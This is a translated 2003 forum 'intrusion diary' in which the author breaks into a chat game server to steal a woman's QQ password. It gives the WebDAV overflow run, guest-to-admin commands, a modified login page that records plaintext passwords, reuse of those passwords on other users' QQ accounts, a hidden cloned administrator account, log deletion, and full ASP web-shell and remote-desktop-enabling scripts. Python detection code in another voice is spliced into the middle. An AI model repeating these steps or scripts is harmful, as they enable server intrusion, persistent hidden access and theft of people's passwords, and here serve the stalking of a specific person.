52157.com Network Security Technology Alliance (ChinaHU)
Source: Oorin0    Updated: 2003-4-27 6:52:03    Reads: 125

An Intrusion Diary


Nick: oorin0 (oo0o, Xrin0)
Email: wt200@km169.net or oo0o@ynmail.com
QQ: 33353290
Audience: network security beginners
I honestly don't know how she is these days, but as a friend I should at least keep an eye on which harassers are on her QQ :P, so I decided to grab her QQ password, haha. OK, to the point. The usual ways of obtaining the password are:
1. Break straight into the Tencent server (crazy)
2. Plant a trojan at the internet cafe and trick her into going online again, haha...... (oh, she has never once been out with me alone, so she obviously dislikes me :)
Since the average user's email, QQ and chatroom passwords (including the Jianghu game) are mostly the same, or simple variations of each other, and since chatroom and Jianghu networks are far more fragile than Tencent's, there are also the following options:
3. Crack the mailbox password over the web (she doesn't use mail...)
4. Social engineering: put up a chatroom on my own website and get her to log in :) (a pity I don't have a website)
5. Attack the chatroom or the Jianghu server and take the password from there
So it looks like an intrusion. The only target is xajh.xxx.com
C:\>ping xajh.xxx.com
Pinging xajh.xxx.com [192.168.0.1] with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time=111ms TTL=125
Reply from 192.168.0.1: bytes=32 time=102ms TTL=125
Reply from 192.168.0.1: bytes=32 time=99ms TTL=125
Reply from 192.168.0.1: bytes=32 time=96ms TTL=125
Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 96ms, Maximum = 111ms, Average = 102ms
// the other side's IP is 192.168.0.1
C:\>telnet 192.168.0.1 80
GET [Enter]
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 16 Apr 2003 11:18:38 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>
Connection to host lost.
So it is Windows 2000. Fine, let's try the WebDAV vulnerability; I fetched webdavx3.rar, written by isno, from www.xfocus.net.
// Server: Microsoft-IIS/5.0 means Windows 2000; 5.1 would be XP and 4.0 NT
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS came back up here; wait a moment)
try offset: -4
// the program stopped here, so I opened another CMD window
C:\>telnet 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user guest /active:y // activate the guest account
The command completed successfully.
C:\WINNT\system32>net user guest password123 // set the guest account password to password123
The command completed successfully.
C:\WINNT\system32>net localgroup administrators guest /add // add the guest account to the administrators group
The command completed successfully.
Check whether 3389 is open:
C:\>telnet 192.168.0.1 3389
GET [Enter]
_ // a waiting cursor shows it is open
Very good. I connected to the other machine with the Terminal Services client, opened "Administrative Tools" -> "Computer Management" -> "Services and Applications" -> clicked "Internet Information Services", and found the system did not respond for a long time.
// this is also a convenient place to learn the physical path of the web application
C:\>telnet 192.168.0.1 80
Connecting To 192.168.0.1...Could not open a connection to the host, on port 80: No connection could be made because the target machine actively refused it.
// port 80 cannot be connected: after the WebDAV overflow succeeded, IIS died
Never mind that for now. Open "Search" and search for all files with "xajh" in the name.
// another way to find the physical path of the web application; at the command line you can also use dir /s and so on
Found it: the physical path is d:\www\xajh\. Found the Jianghu readme (a .txt in d:\www\xajh\), which shows the Jianghu database is c:\www\xajh\h3cw\hc3w_xajh.asp; I copied it to d:\www\xajh\error.mdb.
Back on my own machine I downloaded http://xajh.xxx.com/error.mdb and opened it: unexpectedly only 1MB!? It looked like it had been reorganised. I reconnected to 192.168.0.1 over Terminal Services and found that d:\www\xajh\h3cs\zjh595.asp was 13.6MB, which must be it, so I copied it to D:\www\xajh\error1.mdb, went back to my own machine and downloaded http://xajh.xxx.com/error1.mdb.
After downloading, delete http://xajh.xxx.com/error.mdb and http://xajh.xxx.com/error1.mdb immediately, so as not to attract the administrator's attention.
Opened it: unexpectedly no password had been set on the Access database, haha.....!!! Looked again: hmm, why are all the users' passwords so complex~? Checked the readme in d:\www\xajh\ and learned that it uses MD5 (most chatrooms do now). Brute-forcing would be hard, so I thought of a sniffer, but a sniffer eats a lot of bandwidth and can easily make an experienced administrator suspicious, so I decided on web spoofing instead.
Note that IIS died a moment ago and needs to be started again. //
C:\>net start w3svc
The service could not be started for an unknown reason.
Looks like the only option is to reboot. Here you need to consider whether 3389 will still be open after the reboot (normally IIS starts automatically, but Terminal Services may be turned off).
Method 1:
Open "Control Panel" -> "Administrative Tools" -> "Services"
Find "Terminal Services", double-click it and change "Startup type" to "Automatic"
Find "World Wide Web Publishing", double-click it and check whether it is "Automatic"
If both are "Automatic", IIS and Terminal Services will start automatically after the reboot.
Method 2:
Enable shares; for details see iqst's "Complete IPC$ Intrusion Guide".
C:\>net share
The Server service is not started.
Is it OK to start it? (Y/N) [Y]: Y
The Server service is starting.
The Server service was started successfully.

Share name   Resource      Remark
-----------------------------------------------------
IPC$                       Remote IPC
D$           D:\           Default share
G$           G:\           Default share
F$           F:\           Default share
ADMIN$       D:\WINDOWS    Remote Admin
C$           C:\           Default share
E$           E:\           Default share
Open Terminal Services with a script; for details see caozhe's "A Simple 3389 Intrusion Process".
C:\>cscript rots.vbe 192.168.0.1 guest "password123" 3389 /fr
After a few minutes, the system came back up......
Good, back to the subject. The goal is the Jianghu password, but it is MD5-hashed, so web spoofing is needed. First I built xajhlogo.mdb in Access: one table named "user password" with three fields, "user", "password" and "oicq"; then renamed it to xajhlogo.gif.
Started a TFTP server on my own machine (tftp32 works) and, on the other side:
C:\>tftp -i 127.0.0.1 get xajhlogo.gif xajhlogo.gif // 127.0.0.1 stands for my IP
Then copied it to c:\www\xajh\images\xajhlogo.gif // to reduce the chance of the administrator becoming suspicious
Then started modifying the program: d:\www\xajh\check.asp, which is the login verification file of this version of Jianghu. The content after my changes is as follows:
.........
name=Trim(Request("name"))
password=Trim(Request("pass"))
(the lines above are from the original)
.........
set conn=Server.CreateObject("ADODB.CONNECTION")
set rs=Server.CreateObject("ADODB.RecordSet")
conn.open Application("sjjh_usermdb")
password1=md5(password)
sql="SELECT * FROM user WHERE name='"&name&"'"
rs.open sql,conn,,2,2
if rs.Eof and rs.Bof then
  rs.close
  set rs=nothing
  conn.close
  set conn=nothing
  Response.Redirect "error.asp?id=423"
  Response.end
end if
if rs("password")<>password1 then
  rs.close
  set rs=nothing
  conn.close
  set conn=nothing
  Response.Redirect "error.asp?id=141"
  Response.end
end if
This part I pasted straight from the original Jianghu program (lazy~). The only thing to note is that "password1" must be used here; otherwise the later password comparison would become password=md5(md5(password)), which is wrong.
useroicq=rs("oicq")
rs.close
set rs=nothing
conn.close
set conn=nothing
set conn=Server.CreateObject("ADODB.Connection")
DBPath=Server.MapPath("images/xajhlogo.gif")
set rs=Server.CreateObject("ADODB.RecordSet")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
' table and field names appear here as the page translated them
rs.open "SELECT * FROM [user password] WHERE user='" & name & "'",conn
if not (rs.Bof OR rs.Eof) Then
  sql="Update [user password] Set password='" & password & "' " & "where user='" & name & "'"
  conn.Execute sql
  rs.close
  set rs=nothing
  conn.close
  set conn=nothing
else
  sql="Insert Into [user password] (user,password,oicq) Values ("
  sql=sql & "'" & name & "'" & ","
  sql=sql & "'" & password & "'" & ","
  sql=sql & "'" & useroicq & "'" & ")"
  conn.Execute sql
  rs.close
  set rs=nothing
  conn.close
  set conn=nothing
end if
.............
Everything I added runs before the other side's own Jianghu database operations; this is to avoid errors when the two databases are operated on at the same time.
Below is the beginning of the other side's original database code:
Since we are all newbies, a word of advice: test it on your own machine first, then upload it!!!
set conn=Server.CreateObject("ADODB.CONNECTION")
set rs=Server.CreateObject("ADODB.RecordSet")
conn.open Application("sjjh_usermdb")
.........
And so the long wait began............
After 15 [the rest of this line is garbled in the original]
.........
Now the exciting moment: download http://xajh.xxx.com/images/xajhlogo.gif.
Rename it to 1.mdb and open it.......... Found her ----- *** password. Haha, her password really is the same as her QQ password ^O^
In testing (the first 100 passwords; there were actually 1237 user passwords), 5 people's QQ passwords turned out to be the same as their Jianghu password (since users fill in the QQ number at random, there are probably more; the best approach is to chat with them and ask for the QQ number :D). They don't seem to value their QQ password much, so I guessed they hadn't applied for password protection either; tried it, and 2 of them hadn't, haha........ happy :)
At this point I was both happy and sad: happy that I got her password, sad that so many internet users value their passwords so little, or have such weak security awareness (some have very complex passwords, yet the QQ password and the chatroom password are still the same). Fortunately, I love Q crazily ^-^
Good, now the backdoor: install cmd.asp as d:\www\xajh\images\config.asp.
The code is in the appendix; commands can be run over the web through http://xajh.xxx.com/images/config.asp
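The diary's last step is to edit the log files on the box to remove the download and backdoor traffic, which is exactly why IIS logs should be copied off the host as they are written. Assuming that is done, the following Python script is an added example (not code from the diary) that reads IIS W3C extended log lines, takes the column layout from the #Fields header, and flags the two request patterns seen above: a database file fetched over HTTP (error.mdb, error1.mdb) and a request to a server-side script under the images path (config.asp). The log lines and the STATIC_PREFIXES setting are constructed for the demonstration.

```python
"""Flag database downloads and script hits under static paths in IIS logs.

Added defensive example (not the diary's code). Parses the W3C extended
format written by IIS 5.0, where a '#Fields:' header names the columns, and
reports two request patterns the intrusion above produced. Meant to run on
log copies shipped off the web server.
"""
import os

DB_EXTS = {".mdb"}
SCRIPT_EXTS = {".asp", ".asa"}
STATIC_PREFIXES = ("/images/",)  # assumption: URL paths that serve only static content

# Constructed sample in IIS W3C extended format; not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-04-16 11:20:03 10.0.0.5 GET /error.mdb - 200
2003-04-16 11:21:40 10.0.0.5 GET /error1.mdb - 200
2003-04-16 11:22:09 10.0.0.5 GET /images/xajhlogo.gif - 200
2003-04-16 11:25:10 10.0.0.5 POST /images/config.asp - 200
2003-04-16 11:26:00 10.0.0.7 GET /images/logo.gif - 200
2003-04-16 11:27:00 10.0.0.9 POST /check.asp - 302
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in '#Fields:'."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than guess the columns
        yield dict(zip(fields, parts))


def suspicious_requests(text):
    """Return (category, client_ip, method, uri) for every matching request."""
    findings = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem")
        if stem is None:
            continue
        stem = stem.lower()
        ext = os.path.splitext(stem)[1]
        ip = rec.get("c-ip", "?")
        method = rec.get("cs-method", "?").upper()
        if ext in DB_EXTS:
            findings.append(("database file served over HTTP", ip, method, stem))
        elif ext in SCRIPT_EXTS and stem.startswith(STATIC_PREFIXES):
            findings.append(("script under static path", ip, method, stem))
    return findings


def clients_with_both(findings):
    """Client IPs that both pulled a database and hit a script under a static path."""
    by_ip = {}
    for category, ip, _method, _uri in findings:
        by_ip.setdefault(ip, set()).add(category)
    return sorted(ip for ip, cats in by_ip.items() if len(cats) == 2)


if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE_LOG)
    for category, ip, method, uri in hits:
        print(f"{ip} {method} {uri}: {category}")
    print("clients matching both patterns:", clients_with_both(hits))
```

The correlation in clients_with_both is the useful signal: a single client that first pulls a .mdb and then talks to an .asp inside /images/ is the sequence the diary describes, while either event alone may be noise.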

You will notice I did not use a cloned administrator account. A cloned administrator account uses the very same profile, so if you are careless and leave any trace (for example, some people like to run that DOS command...), the administrator can easily notice. So use cloned administrator accounts with care; it is better to create a hidden administrator account as the backdoor.
First create the InternetUser$ user:
C:\>net user InternetUser$ password123 /add
// the trailing $ keeps it out of the net user listing at the command prompt
Then run regedt32.exe (note: not regedit.exe).
First find HKEY_LOCAL_MACHINE\SAM\SAM and click it; then in the menu "Security" -> "Permissions", add the account or group you are currently logged on as, tick "Full Control" -> "Allow", then OK.
(For example, we logged on as guest a moment ago, but it is already in the Administrators group, so the Administrators group's permission also had to be changed to Full Control; moreover the subkeys Domains, Account and Users must each be done in turn. If you had not changed guest's default group earlier, this would not be necessary.) Now the local SAM information can be read directly.
Now run regedit.exe.
Open the key H KEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$
Check that its default value shows the type "0x3f1". Export the corresponding keys as follows:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\ASPNET$ as InternetUser$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 as 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 as 1f4.reg (the key corresponding to Administrator)
Open 1f4.reg in Notepad and find the "F" value; in this example it looks like this:

"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
Copy it, then open 3f1.reg, find its "F" value, delete it and paste the section above in its place.
Open InternetUser$.reg and copy the section of its content that looks like this:
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
Go back to 3f1.reg and paste this section at the end of the file. The final file content is as follows:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,00,\
  f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
  14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
  01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
  00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
  00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
  08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
  00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
  00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
  00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
  00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
  00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
  00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
  00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
  e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
  00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
  00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
  4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
  76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
  ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
  fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
  37,f1,02,cf,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
After saving, delete the InternetUser$ user:
C:\>net user InternetUser$ /delete
Run regedit.exe and import the 3f1.reg file we just modified.
Finally, open regedt32.exe, find HKEY_LOCAL_MACHINE\SAM\SAM, click it, and in the menu "Security" -> "Permissions" delete the user added a moment ago (for example guest, which we used just now; the Administrators group's settings were changed as well, so, matching the earlier step, the Administrators group must be changed back too, and again the subkeys Domains, Account and Users under SAM must each be done in turn; if you had not changed guest's default group earlier, this would not be necessary).
Thus we have created an account, InternetUser$, that is invisible both to net user at the command prompt and in "Computer Management". Its password cannot be changed, though: as soon as the password is changed it becomes visible in "Computer Management".
Note that every logon (cloned or not) should end with a proper log-off rather than just closing the window; otherwise it shows up in "Terminal Services Manager", and when the administrator later logs off they may wonder why the prompt says "Log off InternetUser$..."!! (I cloned two accounts to test this and did not test Administrators.)
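The clone above works by pasting Administrator's "F" value (key 000001F4) into the key of the new account (000003F1). The F blob records the account's own RID as a little-endian DWORD at offset 0x30, which is why the bytes f4,01,00,00 appear at that position in the listing; after the paste, the key name and the embedded RID no longer agree. The following Python script is an added example, not the diary's code, that parses a regedit export of the Users keys and reports every key where the two differ. The export text is constructed from the F value shown above; the offset is an assumption about the SAM F layout and should be confirmed against a known-good export before the check is relied on.

```python
"""Detect cloned SAM accounts from a regedit export of the Users keys.

Added defensive example (not the diary's code). In each Users\\0000XXXX key,
the "F" value embeds the account's RID as a little-endian DWORD at offset
0x30 (assumption about the F layout; it matches the f4,01,00,00 bytes in the
Administrator F value the diary lists). Copying Administrator's F into
another key therefore leaves a key whose name and embedded RID disagree.
"""
import re

F_RID_OFFSET = 0x30  # assumed position of the RID inside the F blob
KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\([0-9A-Fa-f]{8})\]$"
)
VALUE_RE = re.compile(r'^"(\w+)"=hex:(.*)$')

# Administrator's F value as listed in the diary; the 000003F1 key below is
# the cloned account after the paste (constructed export, not a real dump).
ADMIN_F = (
    "02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\\\n"
    "  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\\\n"
    "  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\\\n"
    "  00,00,00,00,00,00,00"
)
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4]\n"
    f'"F"=hex:{ADMIN_F}\n\n'
    "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003F1]\n"
    f'"F"=hex:{ADMIN_F}\n\n'
    "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\InternetUser$]\n"
    "@=hex(3f1):\n"
)


def _hex_list_to_bytes(s):
    """Turn 'aa,bb,cc' (regedit hex syntax) into bytes."""
    return bytes(int(tok, 16) for tok in s.replace(" ", "").split(",") if tok)


def parse_reg_export(text):
    """Return {key_suffix: {value_name: bytes}} for hex values under the Users keys."""
    keys, current, name, pieces = {}, None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if name is not None:  # continuation of a hex value split with a trailing '\'
            pieces.append(line.rstrip("\\").strip())
            if not line.endswith("\\"):
                keys[current][name] = _hex_list_to_bytes("".join(pieces))
                name, pieces = None, []
            continue
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = m.group(1).upper() if m else None  # ignore Names\ and other keys
            if m:
                keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, body = m.group(1), m.group(2).strip()
            pieces = [body.rstrip("\\").strip()]
            if not body.endswith("\\"):
                keys[current][name] = _hex_list_to_bytes("".join(pieces))
                name, pieces = None, []
    return keys


def embedded_rid(f_blob):
    """RID stored inside an F blob (little-endian DWORD at F_RID_OFFSET)."""
    return int.from_bytes(f_blob[F_RID_OFFSET:F_RID_OFFSET + 4], "little")


def find_cloned_accounts(reg_text):
    """Return (key_rid, embedded_rid) for every key whose F names a different RID."""
    mismatches = []
    for key_hex, values in parse_reg_export(reg_text).items():
        f_blob = values.get("F")
        if f_blob is None or len(f_blob) < F_RID_OFFSET + 4:
            continue
        key_rid = int(key_hex, 16)
        rid = embedded_rid(f_blob)
        if rid != key_rid:
            mismatches.append((key_rid, rid))
    return mismatches


if __name__ == "__main__":
    for key_rid, rid in find_cloned_accounts(SAMPLE_REG):
        print(f"Users\\{key_rid:08X}: F value carries RID 0x{rid:X} (cloned)")
```

A legitimate key always carries its own RID, so any mismatch is worth investigating alongside the other traces the diary mentions: a $-suffixed name under Users\Names, and log-off prompts in Terminal Services Manager for an account the administrator never created.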
Then clean up the logs: since the whole process, including the downloads, was logged, go to the logfiles directory and delete the relevant records from the files.
My skill is poor, so there are surely mistakes and omissions; this article has been revised N times. I ask the masters to criticize and correct it.

Appendix:
--------------------------------------------------
Below is the ASP backdoor; save it as cmd.asp
<%@ Language=VBScript %>
<%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form("CMD")
  If (szCMD <> "") Then
    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName()
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
  End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</PRE>
</BODY>
</HTML>
----------------------------------------------------------------------
Below is the script that opens Terminal Services, taken from caozhe's "A Simple 3389 Intrusion Process"; save it as rots.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
  set objShell=wscript.createObject("wscript.shell")
  objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
  wscript.quit
end if
if wscript.arguments.count<3 then
  usage()
  wscript.echo "Not enough parameters."
  wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
  port=wscript.arguments(3)
else
  port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
  wscript.echo "The number of port is error."
  wscript.quit
end if
if wscript.arguments.count>4 then
  reboot=wscript.arguments(4)
else
  reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
  if instr(objinstoscaption.caption,"Server")>0 then
    wscript.echo "OK!"
  else
    wscript.echo "OS type is "&objinstoscaption.caption
    outstreem.write "Do you want to cancel setup? [y/n] "
    strcancel=instreem.readline
    if lcase(strcancel)<>"n" then wscript.quit
  end if
next
outstreem.write "Writing into registry...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
  .createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
  .setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
  .createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
  .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
  .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
  .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
  .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
  .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
  .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
  outstreem.write "Now, reboot target...."
  strwqlquery="select * from win32_operatingsystem where primary=true"
  set colinstances=objswbemservices.execquery(strwqlquery)
  for each objinstance in colinstances
    objinstance.win32shutdown(flag)
  next
  showerror(err.number)
else
  wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
  if errornumber then
    wscript.echo "Error 0x"&cstr(hex(err.number))&"."
    if err.description<>"" then
      wscript.echo "Error description: "&err.description&"."
    end if
    wscript.quit
  else
    wscript.echo "OK!"
  end if
end function
function usage()
  wscript.echo string(79,"*")
  wscript.echo "ROTS v1.05"
  wscript.echo "Remote Open Terminal services Script, by caozhe"
  wscript.echo "Welcome to visite www.5458.net"
  wscript.echo "Usage:"
  wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
  wscript.echo "port: Default number is 3389. "
  wscript.echo "/r: Auto reboot target. "
  wscript.echo "/fr: Auto force reboot target. "
  wscript.echo string(79,"*")&vbcrlf
end function

Note: This article is written for network security beginners and may be of some help to them. Although the methods used are quite simple, they help in understanding an attacker's mindset and workflow. Of course, this is not to encourage everyone to do the same :)
